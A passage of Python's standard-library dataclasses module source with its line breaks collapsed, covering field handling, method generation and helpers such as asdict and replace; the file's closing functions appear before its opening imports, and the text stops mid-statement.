hasattr(cls, _FIELDS) def asdict(obj, *, dict_factory=dict): """Return the fields of a dataclass instance as a new dictionary mapping field names to field values. Example usage: @dataclass class C: x: int y: int c = C(1, 2) assert asdict(c) == {'x': 1, 'y': 2} If given, 'dict_factory' will be used instead of built-in dict. The function applies recursively to field values that are dataclass instances. This will also look into built-in containers: tuples, lists, and dicts. """ if not _is_dataclass_instance(obj): raise TypeError("asdict() should be called on dataclass instances") return _asdict_inner(obj, dict_factory) def _asdict_inner(obj, dict_factory): if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _asdict_inner(getattr(obj, f.name), dict_factory) result.append((f.name, value)) return dict_factory(result) elif isinstance(obj, tuple) and hasattr(obj, '_fields'): # obj is a namedtuple. Recurse into it, but the returned # object is another namedtuple of the same type. This is # similar to how other list- or tuple-derived classes are # treated (see below), but we just need to create them # differently because a namedtuple's __init__ needs to be # called differently (see bpo-34363). # I'm not using namedtuple's _asdict() # method, because: # - it does not recurse in to the namedtuple fields and # convert them to dicts (using dict_factory). # - I don't actually want to return a dict here. The main # use case here is json.dumps, and it handles converting # namedtuples to lists. Admittedly we're losing some # information here when we produce a json list instead of a # dict. Note that if we returned dicts here instead of # namedtuples, we could no longer call asdict() on a data # structure where a namedtuple was used as a dict key. return type(obj)(*[_asdict_inner(v, dict_factory) for v in obj]) elif isinstance(obj, (list, tuple)): # Assume we can create an object of this type by passing in a # generator (which is not true for namedtuples, handled # above). return type(obj)(_asdict_inner(v, dict_factory) for v in obj) elif isinstance(obj, dict): return type(obj)((_asdict_inner(k, dict_factory), _asdict_inner(v, dict_factory)) for k, v in obj.items()) else: return copy.deepcopy(obj) def astuple(obj, *, tuple_factory=tuple): """Return the fields of a dataclass instance as a new tuple of field values. Example usage:: @dataclass class C: x: int y: int c = C(1, 2) assert astuple(c) == (1, 2) If given, 'tuple_factory' will be used instead of built-in tuple. The function applies recursively to field values that are dataclass instances. This will also look into built-in containers: tuples, lists, and dicts. """ if not _is_dataclass_instance(obj): raise TypeError("astuple() should be called on dataclass instances") return _astuple_inner(obj, tuple_factory) def _astuple_inner(obj, tuple_factory): if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _astuple_inner(getattr(obj, f.name), tuple_factory) result.append(value) return tuple_factory(result) elif isinstance(obj, tuple) and hasattr(obj, '_fields'): # obj is a namedtuple. Recurse into it, but the returned # object is another namedtuple of the same type. This is # similar to how other list- or tuple-derived classes are # treated (see below), but we just need to create them # differently because a namedtuple's __init__ needs to be # called differently (see bpo-34363). return type(obj)(*[_astuple_inner(v, tuple_factory) for v in obj]) elif isinstance(obj, (list, tuple)): # Assume we can create an object of this type by passing in a # generator (which is not true for namedtuples, handled # above). return type(obj)(_astuple_inner(v, tuple_factory) for v in obj) elif isinstance(obj, dict): return type(obj)((_astuple_inner(k, tuple_factory), _astuple_inner(v, tuple_factory)) for k, v in obj.items()) else: return copy.deepcopy(obj) def make_dataclass(cls_name, fields, *, bases=(), namespace=None, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False, match_args=True, slots=False): """Return a new dynamically created dataclass. The dataclass name will be 'cls_name'. 'fields' is an iterable of either (name), (name, type) or (name, type, Field) objects. If type is omitted, use the string 'typing.Any'. Field objects are created by the equivalent of calling 'field(name, type [, Field-info])'. C = make_dataclass('C', ['x', ('y', int), ('z', int, field(init=False))], bases=(Base,)) is equivalent to: @dataclass class C(Base): x: 'typing.Any' y: int z: int = field(init=False) For the bases and namespace parameters, see the builtin type() function. The parameters init, repr, eq, order, unsafe_hash, and frozen are passed to dataclass(). """ if namespace is None: namespace = {} # While we're looking through the field names, validate that they # are identifiers, are not keywords, and not duplicates. seen = set() annotations = {} defaults = {} for item in fields: if isinstance(item, str): name = item tp = 'typing.Any' elif len(item) == 2: name, tp, = item elif len(item) == 3: name, tp, spec = item defaults[name] = spec else: raise TypeError(f'Invalid field: {item!r}') if not isinstance(name, str) or not name.isidentifier(): raise TypeError(f'Field names must be valid identifiers: {name!r}') if keyword.iskeyword(name): raise TypeError(f'Field names must not be keywords: {name!r}') if name in seen: raise TypeError(f'Field name duplicated: {name!r}') seen.add(name) annotations[name] = tp # Update 'ns' with the user-supplied namespace plus our calculated values. def exec_body_callback(ns): ns.update(namespace) ns.update(defaults) ns['__annotations__'] = annotations # We use `types.new_class()` instead of simply `type()` to allow dynamic creation # of generic dataclassses. cls = types.new_class(cls_name, bases, {}, exec_body_callback) # Apply the normal decorator. return dataclass(cls, init=init, repr=repr, eq=eq, order=order, unsafe_hash=unsafe_hash, frozen=frozen, match_args=match_args, slots=slots) def replace(obj, /, **changes): """Return a new object replacing specified fields with new values. This is especially useful for frozen classes. Example usage: @dataclass(frozen=True) class C: x: int y: int c = C(1, 2) c1 = replace(c, x=3) assert c1.x == 3 and c1.y == 2 """ # We're going to mutate 'changes', but that's okay because it's a # new dict, even if called with 'replace(obj, **my_changes)'. if not _is_dataclass_instance(obj): raise TypeError("replace() should be called on dataclass instances") # It's an error to have init=False fields in 'changes'. # If a field is not in 'changes', read its value from the provided obj. for f in getattr(obj, _FIELDS).values(): # Only consider normal fields or InitVars. if f._field_type is _FIELD_CLASSVAR: continue if not f.init: # Error if this field is specified in changes. if f.name in changes: raise ValueError(f'field {f.name} is declared with ' 'init=False, it cannot be specified with ' 'replace()') continue if f.name not in changes: if f._field_type is _FIELD_INITVAR and f.default is MISSING: raise ValueError(f"InitVar {f.name!r} " 'must be specified with replace()') changes[f.name] = getattr(obj, f.name) # Create the new object, which calls __init__() and # __post_init__() (if defined), using all of the init fields we've # added and/or left in 'changes'. If there are values supplied in # changes that aren't fields, this will correctly raise a # TypeError. return obj.__class__(**changes)
import re import sys import copy import types import inspect import keyword import builtins import functools import abc import _thread from types import FunctionType, GenericAlias __all__ = ['dataclass', 'field', 'Field', 'FrozenInstanceError', 'InitVar', 'KW_ONLY', 'MISSING', # Helper functions. 'fields', 'asdict', 'astuple', 'make_dataclass', 'replace', 'is_dataclass', ] # Conditions for adding methods. The boxes indicate what action the # dataclass decorator takes. For all of these tables, when I talk # about init=, repr=, eq=, order=, unsafe_hash=, or frozen=, I'm # referring to the arguments to the @dataclass decorator. When # checking if a dunder method already exists, I mean check for an # entry in the class's __dict__. I never check to see if an attribute # is defined in a base class. # Key: # +=========+=========================================+ # + Value | Meaning | # +=========+=========================================+ # | <blank> | No action: no method is added. | # +---------+-----------------------------------------+ # | add | Generated method is added. | # +---------+-----------------------------------------+ # | raise | TypeError is raised. | # +---------+-----------------------------------------+ # | None | Attribute is set to None. | # +=========+=========================================+ # __init__ # # +--- init= parameter # | # v | | | # | no | yes | <--- class has __init__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __repr__ # # +--- repr= parameter # | # v | | | # | no | yes | <--- class has __repr__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __setattr__ # __delattr__ # # +--- frozen= parameter # | # v | | | # | no | yes | <--- class has __setattr__ or __delattr__ in __dict__? # +=======+=======+=======+ # | False | | | <- the default # +-------+-------+-------+ # | True | add | raise | # +=======+=======+=======+ # Raise because not adding these methods would break the "frozen-ness" # of the class. # __eq__ # # +--- eq= parameter # | # v | | | # | no | yes | <--- class has __eq__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __lt__ # __le__ # __gt__ # __ge__ # # +--- order= parameter # | # v | | | # | no | yes | <--- class has any comparison method in __dict__? # +=======+=======+=======+ # | False | | | <- the default # +-------+-------+-------+ # | True | add | raise | # +=======+=======+=======+ # Raise because to allow this case would interfere with using # functools.total_ordering. # __hash__ # +------------------- unsafe_hash= parameter # | +----------- eq= parameter # | | +--- frozen= parameter # | | | # v v v | | | # | no | yes | <--- class has explicitly defined __hash__ # +=======+=======+=======+========+========+ # | False | False | False | | | No __eq__, use the base class __hash__ # +-------+-------+-------+--------+--------+ # | False | False | True | | | No __eq__, use the base class __hash__ # +-------+-------+-------+--------+--------+ # | False | True | False | None | | <-- the default, not hashable # +-------+-------+-------+--------+--------+ # | False | True | True | add | | Frozen, so hashable, allows override # +-------+-------+-------+--------+--------+ # | True | False | False | add | raise | Has no __eq__, but hashable # +-------+-------+-------+--------+--------+ # | True | False | True | add | raise | Has no __eq__, but hashable # +-------+-------+-------+--------+--------+ # | True | True | False | add | raise | Not frozen, but hashable # +-------+-------+-------+--------+--------+ # | True | True | True | add | raise | Frozen, so hashable # +=======+=======+=======+========+========+ # For boxes that are blank, __hash__ is untouched and therefore # inherited from the base class. If the base is object, then # id-based hashing is used. # # Note that a class may already have __hash__=None if it specified an # __eq__ method in the class body (not one that was created by # @dataclass). # # See _hash_action (below) for a coded version of this table. # __match_args__ # # +--- match_args= parameter # | # v | | | # | no | yes | <--- class has __match_args__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __match_args__ is always added unless the class already defines it. It is a # tuple of __init__ parameter names; non-init fields must be matched by keyword. # Raised when an attempt is made to modify a frozen class. class FrozenInstanceError(AttributeError): pass # A sentinel object for default values to signal that a default # factory will be used. This is given a nice repr() which will appear # in the function signature of dataclasses' constructors. class _HAS_DEFAULT_FACTORY_CLASS: def __repr__(self): return '<factory>' _HAS_DEFAULT_FACTORY = _HAS_DEFAULT_FACTORY_CLASS() # A sentinel object to detect if a parameter is supplied or not. Use # a class to give it a better repr. class _MISSING_TYPE: pass MISSING = _MISSING_TYPE() # A sentinel object to indicate that following fields are keyword-only by # default. Use a class to give it a better repr. class _KW_ONLY_TYPE: pass KW_ONLY = _KW_ONLY_TYPE() # Since most per-field metadata will be unused, create an empty # read-only proxy that can be shared among all fields. _EMPTY_METADATA = types.MappingProxyType({}) # Markers for the various kinds of fields and pseudo-fields. class _FIELD_BASE: def __init__(self, name): self.name = name def __repr__(self): return self.name _FIELD = _FIELD_BASE('_FIELD') _FIELD_CLASSVAR = _FIELD_BASE('_FIELD_CLASSVAR') _FIELD_INITVAR = _FIELD_BASE('_FIELD_INITVAR') # The name of an attribute on the class where we store the Field # objects. Also used to check if a class is a Data Class. _FIELDS = '__dataclass_fields__' # The name of an attribute on the class that stores the parameters to # @dataclass. _PARAMS = '__dataclass_params__' # The name of the function, that if it exists, is called at the end of # __init__. _POST_INIT_NAME = '__post_init__' # String regex that string annotations for ClassVar or InitVar must match. # Allows "identifier.identifier[" or "identifier[". # https://bugs.python.org/issue33453 for details. _MODULE_IDENTIFIER_RE = re.compile(r'^(?:\s*(\w+)\s*\.)?\s*(\w+)') class InitVar: __slots__ = ('type', ) def __init__(self, type): self.type = type def __repr__(self): if isinstance(self.type, type): type_name = self.type.__name__ else: # typing objects, e.g. List[int] type_name = repr(self.type) return f'dataclasses.InitVar[{type_name}]' def __class_getitem__(cls, type): return InitVar(type) # Instances of Field are only ever created from within this module, # and only from the field() function, although Field instances are # exposed externally as (conceptually) read-only objects. # # name and type are filled in after the fact, not in __init__. # They're not known at the time this class is instantiated, but it's # convenient if they're available later. # # When cls._FIELDS is filled in with a list of Field objects, the name # and type fields will have been populated. class Field: __slots__ = ('name', 'type', 'default', 'default_factory', 'repr', 'hash', 'init', 'compare', 'metadata', 'kw_only', '_field_type', # Private: not to be used by user code. ) def __init__(self, default, default_factory, init, repr, hash, compare, metadata, kw_only): self.name = None self.type = None self.default = default self.default_factory = default_factory self.init = init self.repr = repr self.hash = hash self.compare = compare self.metadata = (_EMPTY_METADATA if metadata is None else types.MappingProxyType(metadata)) self.kw_only = kw_only self._field_type = None def __repr__(self): return ('Field(' f'name={self.name!r},' f'type={self.type!r},' f'default={self.default!r},' f'default_factory={self.default_factory!r},' f'init={self.init!r},' f'repr={self.repr!r},' f'hash={self.hash!r},' f'compare={self.compare!r},' f'metadata={self.metadata!r},' f'kw_only={self.kw_only!r},' f'_field_type={self._field_type}' ')') # This is used to support the PEP 487 __set_name__ protocol in the # case where we're using a field that contains a descriptor as a # default value. For details on __set_name__, see # https://www.python.org/dev/peps/pep-0487/#implementation-details. # # Note that in _process_class, this Field object is overwritten # with the default value, so the end result is a descriptor that # had __set_name__ called on it at the right time. def __set_name__(self, owner, name): func = getattr(type(self.default), '__set_name__', None) if func: # There is a __set_name__ method on the descriptor, call # it. func(self.default, owner, name) __class_getitem__ = classmethod(GenericAlias) class _DataclassParams: __slots__ = ('init', 'repr', 'eq', 'order', 'unsafe_hash', 'frozen', ) def __init__(self, init, repr, eq, order, unsafe_hash, frozen): self.init = init self.repr = repr self.eq = eq self.order = order self.unsafe_hash = unsafe_hash self.frozen = frozen def __repr__(self): return ('_DataclassParams(' f'init={self.init!r},' f'repr={self.repr!r},' f'eq={self.eq!r},' f'order={self.order!r},' f'unsafe_hash={self.unsafe_hash!r},' f'frozen={self.frozen!r}' ')') # This function is used instead of exposing Field creation directly, # so that a type checker can be told (via overloads) that this is a # function whose type depends on its parameters. def field(*, default=MISSING, default_factory=MISSING, init=True, repr=True, hash=None, compare=True, metadata=None, kw_only=MISSING): """Return an object to identify dataclass fields. default is the default value of the field. default_factory is a 0-argument function called to initialize a field's value. If init is true, the field will be a parameter to the class's __init__() function. If repr is true, the field will be included in the object's repr(). If hash is true, the field will be included in the object's hash(). If compare is true, the field will be used in comparison functions. metadata, if specified, must be a mapping which is stored but not otherwise examined by dataclass. If kw_only is true, the field will become a keyword-only parameter to __init__(). It is an error to specify both default and default_factory. """ if default is not MISSING and default_factory is not MISSING: raise ValueError('cannot specify both default and default_factory') return Field(default, default_factory, init, repr, hash, compare, metadata, kw_only) def _fields_in_init_order(fields): # Returns the fields as __init__ will output them. It returns 2 tuples: # the first for normal args, and the second for keyword args. return (tuple(f for f in fields if f.init and not f.kw_only), tuple(f for f in fields if f.init and f.kw_only) ) def _tuple_str(obj_name, fields): # Return a string representing each field of obj_name as a tuple # member. So, if fields is ['x', 'y'] and obj_name is "self", # return "(self.x,self.y)". # Special case for the 0-tuple. if not fields: return '()' # Note the trailing comma, needed if this turns out to be a 1-tuple. return f'({",".join([f"{obj_name}.{f.name}" for f in fields])},)' # This function's logic is copied from "recursive_repr" function in # reprlib module to avoid dependency. def _recursive_repr(user_function): # Decorator to make a repr function return "..." for a recursive # call. repr_running = set() @functools.wraps(user_function) def wrapper(self): key = id(self), _thread.get_ident() if key in repr_running: return '...' repr_running.add(key) try: result = user_function(self) finally: repr_running.discard(key) return result return wrapper def _create_fn(name, args, body, *, globals=None, locals=None, return_type=MISSING): # Note that we mutate locals when exec() is called. Caller # beware! The only callers are internal to this module, so no # worries about external callers. if locals is None: locals = {} if 'BUILTINS' not in locals: locals['BUILTINS'] = builtins return_annotation = '' if return_type is not MISSING: locals['_return_type'] = return_type return_annotation = '->_return_type' args = ','.join(args) body = '\n'.join(f' {b}' for b in body) # Compute the text of the entire function. txt = f' def {name}({args}){return_annotation}:\n{body}' local_vars = ', '.join(locals.keys()) txt = f"def __create_fn__({local_vars}):\n{txt}\n return {name}" ns = {} exec(txt, globals, ns) return ns['__create_fn__'](**locals) def _field_assign(frozen, name, value, self_name): # If we're a frozen class, then assign to our fields in __init__ # via object.__setattr__. Otherwise, just use a simple # assignment. # # self_name is what "self" is called in this function: don't # hard-code "self", since that might be a field name. if frozen: return f'BUILTINS.object.__setattr__({self_name},{name!r},{value})' return f'{self_name}.{name}={value}' def _field_init(f, frozen, globals, self_name): # Return the text of the line in the body of __init__ that will # initialize this field. default_name = f'_dflt_{f.name}' if f.default_factory is not MISSING: if f.init: # This field has a default factory. If a parameter is # given, use it. If not, call the factory. globals[default_name] = f.default_factory value = (f'{default_name}() ' f'if {f.name} is _HAS_DEFAULT_FACTORY ' f'else {f.name}') else: # This is a field that's not in the __init__ params, but # has a default factory function. It needs to be # initialized here by calling the factory function, # because there's no other way to initialize it. # For a field initialized with a default=defaultvalue, the # class dict just has the default value # (cls.fieldname=defaultvalue). But that won't work for a # default factory, the factory must be called in __init__ # and we must assign that to self.fieldname. We can't # fall back to the class dict's value, both because it's # not set, and because it might be different per-class # (which, after all, is why we have a factory function!). globals[default_name] = f.default_factory value = f'{default_name}()' else: # No default factory. if f.init: if f.default is MISSING: # There's no default, just do an assignment. value = f.name elif f.default is not MISSING: globals[default_name] = f.default value = f.name else: # This field does not need initialization. Signify that # to the caller by returning None. return None # Only test this now, so that we can create variables for the # default. However, return None to signify that we're not going # to actually do the assignment statement for InitVars. if f._field_type is _FIELD_INITVAR: return None # Now, actually generate the field assignment. return _field_assign(frozen, f.name, value, self_name) def _init_param(f): # Return the __init__ parameter string for this field. For # example, the equivalent of 'x:int=3' (except instead of 'int', # reference a variable set to int, and instead of '3', reference a # variable set to 3). if f.default is MISSING and f.default_factory is MISSING: # There's no default, and no default_factory, just output the # variable name and type. default = '' elif f.default is not MISSING: # There's a default, this will be the name that's used to look # it up. default = f'=_dflt_{f.name}' elif f.default_factory is not MISSING: # There's a factory function. Set a marker. default = '=_HAS_DEFAULT_FACTORY' return f'{f.name}:_type_{f.name}{default}' def _init_fn(fields, std_fields, kw_only_fields, frozen, has_post_init, self_name, globals): # fields contains both real fields and InitVar pseudo-fields. # Make sure we don't have fields without defaults following fields # with defaults. This actually would be caught when exec-ing the # function source code, but catching it here gives a better error # message, and future-proofs us in case we build up the function # using ast. seen_default = False for f in std_fields: # Only consider the non-kw-only fields in the __init__ call. if f.init: if not (f.default is MISSING and f.default_factory is MISSING): seen_default = True elif seen_default: raise TypeError(f'non-default argument {f.name!r} ' 'follows default argument') locals = {f'_type_{f.name}': f.type for f in fields} locals.update({ 'MISSING': MISSING, '_HAS_DEFAULT_FACTORY': _HAS_DEFAULT_FACTORY, }) body_lines = [] for f in fields: line = _field_init(f, frozen, locals, self_name) # line is None means that this field doesn't require # initialization (it's a pseudo-field). Just skip it. if line: body_lines.append(line) # Does this class have a post-init function? if has_post_init: params_str = ','.join(f.name for f in fields if f._field_type is _FIELD_INITVAR) body_lines.append(f'{self_name}.{_POST_INIT_NAME}({params_str})') # If no body lines, use 'pass'. if not body_lines: body_lines = ['pass'] _init_params = [_init_param(f) for f in std_fields] if kw_only_fields: # Add the keyword-only args. Because the * can only be added if # there's at least one keyword-only arg, there needs to be a test here # (instead of just concatenting the lists together). _init_params += ['*'] _init_params += [_init_param(f) for f in kw_only_fields] return _create_fn('__init__', [self_name] + _init_params, body_lines, locals=locals, globals=globals, return_type=None) def _repr_fn(fields, globals): fn = _create_fn('__repr__', ('self',), ['return self.__class__.__qualname__ + f"(' + ', '.join([f"{f.name}={{self.{f.name}!r}}" for f in fields]) + ')"'], globals=globals) return _recursive_repr(fn) def _frozen_get_del_attr(cls, fields, globals): locals = {'cls': cls, 'FrozenInstanceError': FrozenInstanceError} if fields: fields_str = '(' + ','.join(repr(f.name) for f in fields) + ',)' else: # Special case for the zero-length tuple. fields_str = '()' return (_create_fn('__setattr__', ('self', 'name', 'value'), (f'if type(self) is cls or name in {fields_str}:', ' raise FrozenInstanceError(f"cannot assign to field {name!r}")', f'super(cls, self).__setattr__(name, value)'), locals=locals, globals=globals), _create_fn('__delattr__', ('self', 'name'), (f'if type(self) is cls or name in {fields_str}:', ' raise FrozenInstanceError(f"cannot delete field {name!r}")', f'super(cls, self).__delattr__(name)'), locals=locals, globals=globals), ) def _cmp_fn(name, op, self_tuple, other_tuple, globals): # Create a comparison function. If the fields in the object are # named 'x' and 'y', then self_tuple is the string # '(self.x,self.y)' and other_tuple is the string # '(other.x,other.y)'. return _create_fn(name, ('self', 'other'), [ 'if other.__class__ is self.__class__:', f' return {self_tuple}{op}{other_tuple}', 'return NotImplemented'], globals=globals) def _hash_fn(fields, globals): self_tuple = _tuple_str('self', fields) return _create_fn('__hash__', ('self',), [f'return hash({self_tuple})'], globals=globals) def _is_classvar(a_type, typing): # This test uses a typing internal class, but it's the best way to # test if this is a ClassVar. return (a_type is typing.ClassVar or (type(a_type) is typing._GenericAlias and a_type.__origin__ is typing.ClassVar)) def _is_initvar(a_type, dataclasses): # The module we're checking against is the module we're # currently in (dataclasses.py). return (a_type is dataclasses.InitVar or type(a_type) is dataclasses.InitVar) def _is_kw_only(a_type, dataclasses): return a_type is dataclasses.KW_ONLY def _is_type(annotation, cls, a_module, a_type, is_type_predicate): # Given a type annotation string, does it refer to a_type in # a_module? For example, when checking that annotation denotes a # ClassVar, then a_module is typing, and a_type is # typing.ClassVar. # It's possible to look up a_module given a_type, but it involves # looking in sys.modules (again!), and seems like a waste since # the caller already knows a_module. # - annotation is a string type annotation # - cls is the class that this annotation was found in # - a_module is the module we want to match # - a_type is the type in that module we want to match # - is_type_predicate is a function called with (obj, a_module) # that determines if obj is of the desired type. # Since this test does not do a local namespace lookup (and # instead only a module (global) lookup), there are some things it # gets wrong. # With string annotations, cv0 will be detected as a ClassVar: # CV = ClassVar # @dataclass # class C0: # cv0: CV # But in this example cv1 will not be detected as a ClassVar: # @dataclass # class C1: # CV = ClassVar # cv1: CV # In C1, the code in this function (_is_type) will look up "CV" in # the module and not find it, so it will not consider cv1 as a # ClassVar. This is a fairly obscure corner case, and the best # way to fix it would be to eval() the string "CV" with the # correct global and local namespaces. However that would involve # a eval() penalty for every single field of every dataclass # that's defined. It was judged not worth it. match = _MODULE_IDENTIFIER_RE.match(annotation) if match: ns = None module_name = match.group(1) if not module_name: # No module name, assume the class's module did # "from dataclasses import InitVar". ns = sys.modules.get(cls.__module__).__dict__ else: # Look up module_name in the class's module. module = sys.modules.get(cls.__module__) if module and module.__dict__.get(module_name) is a_module: ns = sys.modules.get(a_type.__module__).__dict__ if ns and is_type_predicate(ns.get(match.group(2)), a_module): return True return False def _get_field(cls, a_name, a_type, default_kw_only): # Return a Field object for this field name and type. ClassVars and # InitVars are also returned, but marked as such (see f._field_type). # default_kw_only is the value of kw_only to use if there isn't a field() # that defines it. # If the default value isn't derived from Field, then it's only a # normal default value. Convert it to a Field(). default = getattr(cls, a_name, MISSING) if isinstance(default, Field): f = default else: if isinstance(default, types.MemberDescriptorType): # This is a field in __slots__, so it has no default value. default = MISSING f = field(default=default) # Only at this point do we know the name and the type. Set them. f.name = a_name f.type = a_type # Assume it's a normal field until proven otherwise. We're next # going to decide if it's a ClassVar or InitVar, everything else # is just a normal field. f._field_type = _FIELD # In addition to checking for actual types here, also check for # string annotations. get_type_hints() won't always work for us # (see https://github.com/python/typing/issues/508 for example), # plus it's expensive and would require an eval for every string # annotation. So, make a best effort to see if this is a ClassVar # or InitVar using regex's and checking that the thing referenced # is actually of the correct type. # For the complete discussion, see https://bugs.python.org/issue33453 # If typing has not been imported, then it's impossible for any # annotation to be a ClassVar. So, only look for ClassVar if # typing has been imported by any module (not necessarily cls's # module). typing = sys.modules.get('typing') if typing: if (_is_classvar(a_type, typing) or (isinstance(f.type, str) and _is_type(f.type, cls, typing, typing.ClassVar, _is_classvar))): f._field_type = _FIELD_CLASSVAR # If the type is InitVar, or if it's a matching string annotation, # then it's an InitVar. if f._field_type is _FIELD: # The module we're checking against is the module we're # currently in (dataclasses.py). dataclasses = sys.modules[__name__] if (_is_initvar(a_type, dataclasses) or (isinstance(f.type, str) and _is_type(f.type, cls, dataclasses, dataclasses.InitVar, _is_initvar))): f._field_type = _FIELD_INITVAR # Validations for individual fields. This is delayed until now, # instead of in the Field() constructor, since only here do we # know the field name, which allows for better error reporting. # Special restrictions for ClassVar and InitVar. if f._field_type in (_FIELD_CLASSVAR, _FIELD_INITVAR): if f.default_factory is not MISSING: raise TypeError(f'field {f.name} cannot have a ' 'default factory') # Should I check for other field settings? default_factory # seems the most serious to check for. Maybe add others. For # example, how about init=False (or really, # init=<not-the-default-init-value>)? It makes no sense for # ClassVar and InitVar to specify init=<anything>. # kw_only validation and assignment. if f._field_type in (_FIELD, _FIELD_INITVAR): # For real and InitVar fields, if kw_only wasn't specified use the # default value. if f.kw_only is MISSING: f.kw_only = default_kw_only else: # Make sure kw_only isn't set for ClassVars assert f._field_type is _FIELD_CLASSVAR if f.kw_only is not MISSING: raise TypeError(f'field {f.name} is a ClassVar but specifies ' 'kw_only') # For real fields, disallow mutable defaults for known types. if f._field_type is _FIELD and isinstance(f.default, (list, dict, set)): raise ValueError(f'mutable default {type(f.default)} for field ' f'{f.name} is not allowed: use default_factory') return f def _set_qualname(cls, value): # Ensure that the functions returned from _create_fn uses the proper # __qualname__ (the class they belong to). if isinstance(value, FunctionType): value.__qualname__ = f"{cls.__qualname__}.{value.__name__}" return value def _set_new_attribute(cls, name, value): # Never overwrites an existing attribute. Returns True if the # attribute already exists. if name in cls.__dict__: return True _set_qualname(cls, value) setattr(cls, name, value) return False # Decide if/how we're going to create a hash function. Key is # (unsafe_hash, eq, frozen, does-hash-exist). Value is the action to # take. The common case is to do nothing, so instead of providing a # function that is a no-op, use None to signify that. def _hash_set_none(cls, fields, globals): return None def _hash_add(cls, fields, globals): flds = [f for f in fields if (f.compare if f.hash is None else f.hash)] return _set_qualname(cls, _hash_fn(flds, globals)) def _hash_exception(cls, fields, globals): # Raise an exception. raise TypeError(f'Cannot overwrite attribute __hash__ ' f'in class {cls.__name__}') # # +-------------------------------------- unsafe_hash? # | +------------------------------- eq? # | | +------------------------ frozen? # | | | +---------------- has-explicit-hash? # | | | | # | | | | +------- action # | | | | | # v v v v v _hash_action = {(False, False, False, False): None, (False, False, False, True ): None, (False, False, True, False): None, (False, False, True, True ): None, (False, True, False, False): _hash_set_none, (False, True, False, True ): None, (False, True, True, False): _hash_add, (False, True, True, True ): None, (True, False, False, False): _hash_add, (True, False, False, True ): _hash_exception, (True, False, True, False): _hash_add, (True, False, True, True ): _hash_exception, (True, True, False, False): _hash_add, (True, True, False, True ): _hash_exception, (True, True, True, False): _hash_add, (True, True, True, True ): _hash_exception, } # See https://bugs.python.org/issue32929#msg312829 for an if-statement # version of this table. def _process_class(cls, init, repr, eq, order, unsafe_hash, frozen, match_args, kw_only, slots): # Now that dicts retain insertion order, there's no reason to use # an ordered dict. I am leveraging that ordering here, because # derived class fields overwrite base class fields, but the order # is defined by the base class, which is found first. fields = {} if cls.__module__ in sys.modules: globals = sys.modules[cls.__module__].__dict__ else: # Theoretically this can happen if someone writes # a custom string to cls.__module__. In which case # such dataclass won't be fully introspectable # (w.r.t. typing.get_type_hints) but will still function # correctly. globals = {} setattr(cls, _PARAMS, _DataclassParams(init, repr, eq, order, unsafe_hash, frozen)) # Find our base classes in reverse MRO order, and exclude # ourselves. In reversed order so that more derived classes # override earlier field definitions in base classes. As long as # we're iterating over them, see if any are frozen. any_frozen_base = False has_dataclass_bases = False for b in cls.__mro__[-1:0:-1]: # Only process classes that have been processed by our # decorator. That is, they have a _FIELDS attribute. base_fields = getattr(b, _FIELDS, None) if base_fields is not None: has_dataclass_bases = True for f in base_fields.values(): fields[f.name] = f if getattr(b, _PARAMS).frozen: any_frozen_base = True # Annotations that are defined in this class (not in base # classes). If __annotations__ isn't present, then this class # adds no new annotations. We use this to compute fields that are # added by this class. # # Fields are found from cls_annotations, which is guaranteed to be # ordered. Default values are from class attributes, if a field # has a default. If the default value is a Field(), then it # contains additional info beyond (and possibly including) the # actual default value. Pseudo-fields ClassVars and InitVars are # included, despite the fact that they're not real fields. That's # dealt with later. cls_annotations = cls.__dict__.get('__annotations__', {}) # Now find fields in our class. While doing so, validate some # things, and set the default values (as class attributes) where # we can. cls_fields = [] # Get a reference to this module for the _is_kw_only() test. KW_ONLY_seen = False dataclasses = sys.modules[__name__] for name, type in cls_annotations.items(): # See if this is a marker to change the value of kw_only. if (_is_kw_only(type, dataclasses) or (isinstance(type, str) and _is_type(type, cls, dataclasses, dataclasses.KW_ONLY, _is_kw_only))): # Switch the default to kw_only=True, and ignore this # annotation: it's not a real field. if KW_ONLY_seen: raise TypeError(f'{name!r} is KW_ONLY, but KW_ONLY ' 'has already been specified') KW_ONLY_seen = True kw_only = True else: # Otherwise it's a field of some type. cls_fields.append(_get_field(cls, name, type, kw_only)) for f in cls_fields: fields[f.name] = f # If the class attribute (which is the default value for this # field) exists and is of type 'Field', replace it with the # real default. This is so that normal class introspection # sees a real default value, not a Field. if isinstance(getattr(cls, f.name, None), Field): if f.default is MISSING: # If there's no default, delete the class attribute. # This happens if we specify field(repr=False), for # example (that is, we specified a field object, but # no default value). Also if we're using a default # factory. The class attribute should not be set at # all in the post-processed class. delattr(cls, f.name) else: setattr(cls, f.name, f.default) # Do we have any Field members that don't also have annotations? for name, value in cls.__dict__.items(): if isinstance(value, Field) and not name in cls_annotations: raise TypeError(f'{name!r} is a field but has no type annotation') # Check rules that apply if we are derived from any dataclasses. if has_dataclass_bases: # Raise an exception if any of our bases are frozen, but we're not. if any_frozen_base and not frozen: raise TypeError('cannot inherit non-frozen dataclass from a ' 'frozen one') # Raise an exception if we're frozen, but none of our bases are. if not any_frozen_base and frozen: raise TypeError('cannot inherit frozen dataclass from a ' 'non-frozen one') # Remember all of the fields on our class (including bases). This # also marks this class as being a dataclass. setattr(cls, _FIELDS, fields) # Was this class defined with an explicit __hash__? Note that if # __eq__ is defined in this class, then python will automatically # set __hash__ to None. This is a heuristic, as it's possible # that such a __hash__ == None was not auto-generated, but it # close enough. class_hash = cls.__dict__.get('__hash__', MISSING) has_explicit_hash = not (class_hash is MISSING or (class_hash is None and '__eq__' in cls.__dict__)) # If we're generating ordering methods, we must be generating the # eq methods. if order and not eq: raise ValueError('eq must be true if order is true') # Include InitVars and regular fields (so, not ClassVars). This is # initialized here, outside of the "if init:" test, because std_init_fields # is used with match_args, below. all_init_fields = [f for f in fields.values() if f._field_type in (_FIELD, _FIELD_INITVAR)] (std_init_fields, kw_only_init_fields) = _fields_in_init_order(all_init_fields) if init: # Does this class have a post-init function? has_post_init = 